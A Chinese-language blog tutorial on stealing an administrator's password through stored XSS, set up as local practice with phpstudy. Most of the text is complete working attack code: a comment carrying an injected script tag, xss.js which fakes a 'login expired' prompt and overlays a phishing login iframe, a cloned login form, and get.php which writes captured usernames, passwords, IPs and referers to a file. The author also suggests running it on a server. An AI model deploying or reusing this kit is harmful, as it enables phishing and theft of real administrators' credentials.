xss获取管理员的用户密码(本地实战)

更上一层楼!!!

环境准备

phpstudy

实战

phpstudy指定localhost目录下编写如下文件:

复制代码
admin_login.html  //原管理登录页面
admin_index.html  //原管理后台页面
fish.html         //我们高仿的登录页面,也就是钓鱼页
get.php           //数据接收文件
xss.js            //xss的payload

代码量比较少,就此复制粘贴即可

admin_login.html

复制代码
//admin_login.html  原管理登录页面
<html>
<body>
<head><title>管理员登录</title></head>
<form method="post" action="http://xxx/x.php">
用户名:<br>
<input type="text" name="username">
<br>
密码:<br>
<input type="text" name="password">
<br><br>
<input type="submit" value="登录">
</form> 
</body>
</html>

admin_index.html

复制代码
//admin_index.html  原管理后台页面
<html>
<body>
<head><title>管理员后台</title></head>
<h1>这里是管理员后台,你已成功登录</h1>
<button type="button">一键日卫星</button>
<hr><b>最新留言</b>
<ul>
<li>说书人长得好帅</li>
<li>楼上说得对<script src= "http://127.0.0.1/xss.js"></script></li>
</ul>
</body>
</html>

fish.html

复制代码
//fish.html  我们仿的登录页面,也就是钓鱼页
<body>
<head><title>管理员登录</title></head>
<form method="post" action="http://127.0.0.1/get.php">//这里发送给接收程序
用户名:<br>
<input type="text" name="username">
<br>
密码:<br>
<input type="text" name="password">
<br><br>
<input type="submit" value="Submit">
</form> 
</body>
</html>

get.php

复制代码
//get.php  数据接收文件
<?php
$line = '----------------------------------'."\r\n";
$user = '账号:'.$_POST['username']."\r\n";
$pwd = '密码:'.$_POST['password']."\r\n";
$ip = 'IP:'.getenv('REMOTE_ADDR')."\r\n";
$url = '钓鱼模板:'.getenv('HTTP_REFERER')."\r\n";
$date ='日期:'. date("Y-m-d")."\r\n";
$result = $line.$url.$user.$pwd.$ip.$date;
file_put_contents('good.txt',$result, FILE_APPEND);
header("Location: http://127.0.0.1/admin_index.html");
?>

xss.js

复制代码
//xss.js  xss的payload
setTimeout(function() {
    alert("登陆过期,请重新登陆!");
    parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src = \"127.0.0.1/fish.html\" frameBorder=0 scrolling=no></iframe>");
    setTimeout(function() {
        document.getElementsByTagName("body")[0].setAttribute("style", "margin: 2px;");
    },
    100);
    setTimeout(function() {
        parent.document.getElementsByTagName("body")[0].setAttribute("style", "margin: 0px;");
    },
    100);
},
600000);

进入网页admin_login.html进行实战

实战完成后,在编写的所有文件目录下查找good.txt,上面记录的管理员的账户密码。实战结束

留言

有服务器的可以在服务器上实战。祝你们学习顺利!!!

相关推荐
NQGL.29 分钟前
第八章 网络安全
网络·安全·web安全
小幽余生不加糖1 小时前
反无人机系统:技术利刃如何守护低空安全?
笔记·学习·安全·无人机
计算机毕设定制辅导-无忧学长4 小时前
企业级安全实践:SSL 加密与权限管理(一)
网络·安全·ssl
网络安全小吗喽5 小时前
靶场(二十七)---小白心得&&靶场体会---Hawat
网络·测试工具·安全·网络安全·靶场
开开心心就好7 小时前
高效批量转换Word到PDF的方法
javascript·安全·智能手机·pdf·word·objective-c·lisp
冰茶_8 小时前
[Github]GitHub 2FA快速安全配置全攻略
安全·github·2fa
测试专家9 小时前
ARINC653分区调度算法的研究与改进
大数据·运维·网络·安全
FreeBuf_10 小时前
ACR窃密木马改头换面,更名重构后规避能力升级
网络·安全
mooyuan天天10 小时前
pikachu靶场通关笔记42 不安全的URL重定向
安全·web安全·url重定向·pikachu靶场·不安全的重定向
电院工程师1 天前
基于机器学习的侧信道分析(MLSCA)Python实现(带测试)
人工智能·python·嵌入式硬件·安全·机器学习·密码学